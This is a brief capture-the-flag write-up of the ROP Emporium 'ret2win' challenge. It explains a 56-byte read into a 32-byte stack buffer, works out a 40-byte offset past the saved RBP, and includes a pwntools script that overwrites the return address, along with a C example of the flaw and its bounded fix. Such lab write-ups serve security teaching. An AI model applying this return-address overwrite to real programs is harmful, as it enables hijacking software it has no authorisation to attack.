ROP Emporium


ret2win

There's a ret2win function that I need to run.

The main function calls a pwnme function.

OK, there is a buffer overflow here, since it reads 56 bytes into a 32-byte buffer.

So I have to send 32 bytes of anything followed by the address of ret2win.

But it does not work, because I also need to overwrite the saved RBP; that's another 8 bytes of padding before the return address.
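The overflowing read and its bounded replacement, as an added C example (not the challenge's own source; the 32-byte buffer followed by the 8-byte saved RBP is the layout the writeup describes, and the function names are hypothetical):

```c
#include <stddef.h>
#include <stdio.h>
#include <unistd.h>

#define BUF_SIZE 32          /* buffer size stated in the writeup */
#define SAVED_RBP_SIZE 8     /* saved RBP sits right after the buffer */

/* Offset from the start of the buffer to the saved return address:
 * the buffer itself plus the saved RBP. For 32 + 8 this is 40. */
size_t ret_addr_offset(size_t buf_size, size_t saved_rbp_size) {
    return buf_size + saved_rbp_size;
}

/* Bytes an unchecked read can write past the end of the buffer. */
size_t overflow_bytes(size_t buf_size, size_t read_len) {
    return read_len > buf_size ? read_len - buf_size : 0;
}

/* Vulnerable pattern (hypothetical reconstruction of pwnme): the read
 * length is independent of the buffer size. With a length of 56, as in
 * the challenge, 24 bytes spill over the saved RBP and return address. */
ssize_t pwnme_vulnerable(int fd, size_t read_len) {
    char buf[BUF_SIZE];
    return read(fd, buf, read_len);
}

/* Hardened form: the read is bounded by the buffer, with one byte
 * reserved so the input can always be NUL-terminated. */
ssize_t pwnme_fixed(int fd) {
    char buf[BUF_SIZE];
    ssize_t n = read(fd, buf, sizeof(buf) - 1);
    if (n < 0)
        return n;
    buf[n] = '\0';
    return n;
}

int main(void) {
    printf("offset to return address: %zu\n",
           ret_addr_offset(BUF_SIZE, SAVED_RBP_SIZE));
    printf("bytes written past the buffer: %zu\n",
           overflow_bytes(BUF_SIZE, 56));
    return 0;
}
```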

I got the flag (I am not sure why the program is not cat-ing out the flag; probably something with the permissions).

Solution:

from pwn import *

p = process('./ret2win')
p.recv()  # consume the challenge banner and prompt

buffer  = b"A"*40                  # 32-byte buffer + 8 bytes of saved RBP
ret2win = p64(0x0000000000400756)  # address of ret2win, little-endian

p.sendline(buffer + ret2win)
print(p.recv())